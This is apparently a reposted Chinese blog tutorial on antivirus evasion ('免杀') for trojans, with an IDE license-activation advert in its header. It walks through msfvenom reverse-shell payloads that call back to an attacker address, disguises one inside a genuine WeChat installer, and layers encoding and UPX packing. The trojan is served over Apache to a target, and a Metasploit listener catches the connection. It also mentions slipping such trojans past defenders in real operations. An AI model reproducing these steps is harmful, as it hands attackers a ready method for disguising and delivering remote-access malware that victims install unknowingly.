木马免杀方式_木马入侵的常见方法

木马免杀方式_木马入侵的常见方法前言免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。1、裸

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

前言

免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。免杀的基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。免杀技术也并不是十恶不赦的,例如,在软件保护所用的加密产品(比如壳)中,有一些会被杀毒软件认为是木马病毒;一些安全领域中的部分安全检测产品,也会被杀毒软件误杀,这时就需要免杀技术来应对这些不稳定因素。

1、裸奔马的尝试

意为不做任何免杀处理的木马

1、使用msf的msfvenom生成木马文件,生成一个裸奔马,命名为 weixin.exe吧

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe

木马免杀方式_木马入侵的常见方法

2、部署一下kali上的apache服务,令目标机器能够访问下载我们生成的木马

2.1、kali中是自带有apache的,启动apache服务

木马免杀方式_木马入侵的常见方法

2.2、把生成的weixin.exe文件放在/var/www/html文件夹下

木马免杀方式_木马入侵的常见方法

2.3、在靶机下访问192.168.111.132/weinxin.exe,已经下载

木马免杀方式_木马入侵的常见方法

2.4、发现被AV查杀

木马免杀方式_木马入侵的常见方法

木马免杀方式_木马入侵的常见方法

如果在实战中,直接投递裸奔马比较容易引起对方运维人员的警觉,这种方式也比较冒险,所以在投递之前,要测试制作的木马是否会引起相关AV的查杀,比如在在线多引擎病毒识别工具中去测试

2.5、这里po一个在线杀毒查杀的网站,virustotal是一个提供免费的可疑文件分析服务的网站,它与传统杀毒软件的不同之处是它通过多种反病毒引擎扫描文件。使用多种反病毒引擎对您所上传的文件进行检测, 以判断文件是否被病毒, 蠕虫, 木马, 以及各类恶意软件感染。

木马免杀方式_木马入侵的常见方法

2、MSF编码

在metasploit框架下免杀的方式之一是msf编码器,功能是使用msf编码器对我们制作的木马进行重新编码,生成一个二进制文件,这个文件运行后,msf编码器会将原始程序解码到内存中并执行。

1、在kali终端输入 msfvenom -l encoders,这可以列出所有可用的编码格式

木马免杀方式_木马入侵的常见方法

2、在msf的/data/templates/下有很多metasploit自带的用于捆绑木马的程序模板,这个模块但是一些反病毒厂商关注的重点,为了更好的实现免杀,我们需要自主选择一个待捆绑程序。在这里选择是真正的微信安装包。(也有对裸奔马进行shikata_ga_nai编码饶AV的方法,但是shikata_ga_nai编码技术多态,每次生成的攻击载荷文件都不一样,有时生成的文件会被查杀,有时不会,所以结合以上思路,生成一个捆绑木马,并进行shikata_ga_nai编码)

木马免杀方式_木马入侵的常见方法

把微信安装包放在/root文件夹下

木马免杀方式_木马入侵的常见方法

3、使用msfvenom生成一个Windows环境下的木马,并捆绑到WeChatSetup.exe上生成WeChatSetup1.exe的合成马,同时对木马进行x86/shikata_ga_nai进行多次编码的方式进行免杀处理。

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

木马免杀方式_木马入侵的常见方法

参数说明:

-e /指定编码方式对攻击载荷进行重新编码

-x /指定木马捆绑在哪个可执行程序模板上

-i /指定对目标进行编码的次数,多次编码理论上有助于免杀的实现

-f /指定msf编码器输出程序的格式

-0 /指定处理完毕后的文件输出路径

4、把生成的文件放在kali中的apache服务对应的文件夹下,令攻击机访问

木马免杀方式_木马入侵的常见方法

5、攻击机下载后,在msf上创建监听

use exploit/multi/handler

set payload windows/shell/reverse_tcp ///选择payload为Windows/shell/reverse_tcp

show options ///查看一下哪些选项需要配置

set lhost 192.168.111.132 ///设置一下主机地址

set lport 9999 ///设置下主机端口,为木马设定的端口

run

木马免杀方式_木马入侵的常见方法

6、在目标机器上点击伪造的安装包,没有打开,因为捆绑木马并多次编码后,安装包源文件已经损坏,但是在攻击机的,目标机器已经上线

木马免杀方式_木马入侵的常见方法

3、UPX加壳

upx打包器有两种功能,一种叫做给程序加壳,一种叫压缩程序,在这里使用打包器的目的是改变后门程序的特征码。

压缩的时候:它首先可执行文件中的可执行数据解压出来,然后将解压缩用的代码附加在前面

运行的时候:将原本的可执行数据解压出来,然后再运行解压缩后的数据

1、在kali中内置了upx打包器,输入upx可以看下参数介绍

木马免杀方式_木马入侵的常见方法

2、简单的命令就是直接upx file,对file文件进行加壳处理,加壳后,因为经过压缩,文件大小会变小

木马免杀方式_木马入侵的常见方法

3、还是老样子,把上面经历过编码后,又加壳的weixin安装包放在apache服务的文件夹下,供目标机器读取下载(如上2.4)

image-20210827122242290

4、在msf上可以创建正常的连接和监听,成功传回

image-20210827123615128

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/171447.html原文链接:https://javaforall.net

(0)
上一篇 2022年8月21日 下午10:46
下一篇 2022年8月21日 下午10:46


相关推荐

  • n皇后问题c语言代码_c语言序列求和输入两个正整数m和n

    n皇后问题c语言代码_c语言序列求和输入两个正整数m和nn皇后问题研究的是如何将n个皇后放置在n×n的棋盘上,并且使皇后彼此之间不能相互攻击。(即任意两个皇后都不能处于同一行、同一列或同一斜线上).上图为8皇后问题的一种解法。给定一个整数n,返回所有不同的n皇后问题的解决方案。每一种解法包含一个明确的n皇后问题的棋子放置方案,该方案中’Q’和’.’分别代表了皇后和空位。示例:输入:4输出:[…

    2026年4月18日
    3
  • 10分钟让你掌握Linux常用命令(+1.4万+++收藏)

    10分钟让你掌握Linux常用命令(+1.4万+++收藏)1、目录操作。2、文件操作。3、文件内容操作。4、压缩和解压缩。5、日志查看。6、Linux下文件的详细信息。7、常用的docker容器的命令。8、其他命令。

    2022年6月16日
    36
  • Sql Server Md5使用

    Sql Server Md5使用SQLServer 的 Md5 使用如下 selectsubstr sys fn sqlvarbaseto HashBytes MD5 3 32

    2026年3月16日
    1
  • shell中find的用法_grep用法linux

    shell中find的用法_grep用法linuxfind命令的一般格式:findpathname-options[-exec]pathname是find命令所查找的目录路径-exec对匹配的文件执行该参数所给出的shell命令-options选项参数:-name按照文件名查找文件-perm按照文件权限来查找文件-user按照文件属主来

    2022年10月15日
    4
  • 【软著】自己申请软件著作权流程

    【软著】自己申请软件著作权流程现在越来越多的安卓市场需要软著才能注册或者是才能上线 申请软著势在必行 最简单的方式 简单的准备资料 找第三方代理 不过这样可能花费数百毛爷爷 如果是急需加急 可能是几千 现在简单说一下自己申请的流程 首先贴出中国版权保护中心网站中国版权保护中心 http apply ccopyright com cn cpcc column list bqdj jsp 请使用 IE 浏览器打开一 注册

    2026年3月19日
    3
  • alternatives java_Centos使用alternatives切换Java版本

    alternatives java_Centos使用alternatives切换Java版本在 usr bin 目录下创建一个符号链接 指向 etc alternatives 下的的文件 而该文件依然是一个符号链接 举个栗子 root node1mec ll usr bin javalrwxrwxr 1rootroot224 月 1616 06 usr bin java gt etc alternatives java12 root node1

    2026年3月18日
    1

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号